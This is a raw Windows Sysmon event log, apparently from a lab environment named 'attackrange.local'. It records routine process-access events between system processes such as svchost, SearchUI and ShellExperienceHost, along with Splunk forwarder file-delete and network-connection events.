07:54:54.308{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049851Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:54.308{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049850Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:54.308{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049849Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:54.308{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049848Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:54.308{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049847Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:54.308{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049846Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:54.308{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049845Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:54.308{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049844Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:54.308{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049843Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:54.308{466BC892-32D3-60E8-700B-00000000CF01}1664384C:\Windows\System32\sihost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049842Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:54.292{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCB24A6FAACB43716A4433361AFDB595,SHA256=F3F5C5C0E1713A1F76FB036215A7ABF7D09604ADE0EC942F068170A763989FE8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049841Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:54.140{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049840Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:54.140{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049839Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:54.140{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049838Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:54.140{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049837Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:54.140{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049836Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:54.140{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049835Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:54.077{466BC892-F54D-60EB-527D-00000000CF01}17244732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000808034Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:54.266{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57298-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808033Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:55.897{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F99D4803CB5A71348ED28CF253EC4F51,SHA256=CF1CEE0FA643316AB28D6C9579DC13A9AABEF96625A854A655C3C750127FF898,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049879Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
